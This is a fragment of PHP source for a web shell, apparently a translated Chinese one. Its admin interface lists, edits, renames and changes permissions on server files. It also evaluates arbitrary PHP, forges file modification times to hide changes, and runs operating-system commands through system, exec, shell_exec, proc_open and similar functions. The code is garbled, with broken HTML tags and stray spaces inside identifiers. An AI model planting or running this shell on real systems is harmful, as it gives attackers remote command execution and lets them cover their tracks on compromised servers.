$dirperm=substr(base_convert(fileperms($filepath),10,8),-4); 
echo "n"; 
echo " [$file]n"; 
echo " $ctimen"; 
echo " $mtimen"; 
echo " Searchn"; 
echo " $dirpermn"; 
echo " | Delete< ;/a> | Renamen";
echo "n";
$dir_i++;
} else {
if($file=="..") {
echo "n";
echo "
Return to the parent directoryn";
echo "< /tr>n";
}
}
}
}// while
@closedir($dirs);
?>



// File list
$dirs=@opendir($dir);
$file_i = '0';
while ($ file=@readdir($dirs)) {
$filepath="$dir/$file";
$a=@is_dir($filepath);
if($a=="0"){
$size=@ filesize($filepath);
$size=$size/1024;
$size= @number_format($size, 3);
if (@filectime($filepath) == @filemtime($filepath)) {
$ctime =@date("Y-m-d H:i:s",@filectime($filepath));
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
} else {
$ctime="".@date("Y-m-d H:i:s",@filectime($filepath))."";
$mtime="< ;span class="redfont">".@date("Y-m-d H:i:s",@filemtime($filepath))."";
}
@$fileperm=substr(base_convert( @fileperms($filepath),10,8),-4);
echo "n";
echo " ";
echo "";
echo "$filen";
echo " $ctimen" ;
echo " $mtimen";
echo " < span class="redfont">$size KBn";
echo " $filepermn";
echo " < td align="center" nowrap>Download | Edit | | Rename< ;/a> | Timen";
echo "n";
$file_i++;
}
}// while
@closedir($dirs);
if(get_cfg_var('safemode'))$z = "
(?)";
else $z = "(?)";
$tb->tdbody('
'.$tb->makeinput('chkall','on','onclick=" CheckAll(this.form)"','checkbox','30','').' Local file: '.$tb->makeinput('localfile','','','text','15 ').''.$tb->makeinput('downrar','Select package download or save locally','','submit').' '.$z.''.$dir_i.' directories / '.$file_i.' files
','center',getrowbg(),'' ,'','6');

echo "
n";
echo "n";
}// end dir

elseif ($_GET['action'] = = "editfile") {
if(empty($newfile)) {
$filename="$dir/$editfile";
$fp=@fopen($filename,"r");
$contents=@fread( $fp, filesize($filename));
@fclose($fp);
$contents=htmlspecialchars($contents);
}else{
$editfile=$newfile;
$filename = "$dir/$editfile" ;
}
$action = "?dir=".urlencode($dir)."&editfile=".$editfile;
$tb->tableheader();
$tb->formheader($action,'New /Edit file');
$tb->tdbody('Current file: '.$tb->makeinput('editfilename',$filename).' Enter a new file name to create a new file. Php code encryption: < input type="checkbox" name="change" value="yes" onclick="javascript:alert('This function can only be used to encrypt or compress complete PHP code. \n\nPlease do not use non-php code or incomplete php code or does not support the gzinflate function! ')"> ');
$tb->tdbody($tb->maketextarea('filecontent',$contents));
$tb->makehidden('do','doeditfile');
$tb->formfooter('1','30');
}//end editfile

elseif ($_GET['action'] == "rename") {
$nowfile = (isset($_POST[ 'newname'])) ? $_POST['newname'] : basename($_GET['fname']);
$action = "?dir=".urlencode($dir)."&fname=".urlencode($ fname);
$tb->tableheader();
$tb->formheader($action,'Modify file name');
$tb->makehidden('oldname',$dir."/". $nowfile);
$tb->makehidden('dir',$dir);
$tb->tdbody('Current file name: '.basename($nowfile));
$tb->tdbody( 'Rename: '.$tb->makeinput('newname'));
$tb->makehidden('do','rename');
$tb->formfooter('1','30 ');
}//end rename

elseif ($_GET['action'] == "eval") {
$action = "?dir=".urlencode($dir)."";
$tb- >tableheader();
$tb->formheader(''.$action.' "target="_blank' ,'Execute php script');
$tb->tdbody($tb->maketextarea( 'phpcode',$contents));
$tb->formfooter('1','30');

}
elseif ($_GET['action'] == "fileperm") {
$action = "?dir=".urlencode($dir)."&file=".$file;
$tb->tableheader();
$tb->formheader($action,'Modify file attributes');
$ tb->tdbody('Modify the attributes of '.$file.' to: '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10, 8),-4)));
$tb->makehidden('file',$file);
$tb->makehidden('dir',urlencode($dir));
$tb->makehidden('do','editfileperm');
$tb->formfooter('1','30');
}//end fileperm

elseif ($_GET['action'] == "newtime") {
$action = "?dir=".urlencode($dir);
$cachemonth = array('January'=>1,'February'=>2,'March'=> ;3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9 ,'October'=>10,'November'=>11,'December'=>12);
$tb->tableheader();
$tb->formheader($action,'Clone file Last modification time');
$tb->tdbody("Modify file: ".$tb->makeinput('curfile',$file,'readonly')." → Target file: ".$tb-> ;makeinput('tarfile','Full path and file name required'),'center','2','30');
$tb->makehidden('do','domodtime');
$ tb->formfooter('','30');
$tb->formheader($action,'Last modification time of custom file');
$tb->tdbody('
< ul>
  • A typical range of valid timestamps is from Friday 13 December 1901 20:45:54 GMT to Tuesday 19 January 2038 03:14:07
    (This date is based on (from the minimum and maximum values ​​of 32-bit signed integers)
  • Note: The day is between 01 and 30, the hour is between 0 and 24, and the minutes and seconds are between 0 and 60 !
  • ','left');
    $tb->tdbody('Current file name: '.$file);
    $tb->makehidden('curfile',$ file);
    $tb->tdbody('Modify to: '.$tb->makeinput('year','1984','','text','4').'Year'.$tb ->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).' month'.$tb->makeinput(' data','18','','text','2').' day'.$tb->makeinput('hour','20','','text','2'). 'When'.$tb->makeinput('minute','00','','text','2').' Minute'.$tb->makeinput('second','00', '','text','2').' seconds','center','2','30');
    $tb->makehidden('do','modmytime');
    $tb- >formfooter('1','30');
    }//end newtime

    elseif ($_GET['action'] == "shell") {
    $action = "??action=shell&dir=". urlencode($dir);
    $tb->tableheader();
    $tb->tdheader('WebShell Mode');
    if (substr(PHP_OS, 0, 3) == 'WIN') {
    $ program = isset($_POST['program']) ? $_POST['program'] : "c:winntsystem32cmd.exe";
    $prog = isset($_POST['prog']) ? $_POST['prog' ] : "/c net start > ".$pathname."/log.txt";
    echo "
    n";
    $tb->tdbody('Run the program without echo→ File: '.$tb->makeinput('program',$program).' Parameters: '.$tb->makeinput ('prog',$prog,'','text','40').' '.$tb->makeinput('','Run','','submit'),'center',' 2','35');
    $tb->makehidden('do','programrun');
    echo "
    n";
    }
    echo "
    n";
    if(isset($_POST['cmd'])) $cmd = $_POST['cmd'];
    $tb ->tdbody('Tips: If the output result is incomplete, it is recommended to write the output result to a file. This way you can get the entire content. ');
    $tb->tdbody('If the proc_open function is not the default winnt system, please do it yourself Set up and use, modify it yourself and remember to write to exit, otherwise an unfinished process will be left on the host.');
    $tb->tdbody('The location of the cmd program to be used by the proc_open function:'.$tb-> ;makeinput('cmd',$cmd,'','text','30').'(If it is a Linux system, you can modify it yourself)');
    $execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell','proc_open'=>'proc_open') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','proc_open'=>'proc_open'); 
    $tb->tdbody('选择执行函数: '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' 输入命令: '.$tb->makeinput('command',$_POST['command'],'','text','60').' '.$tb->makeinput('','Run','','submit')); 
    ?>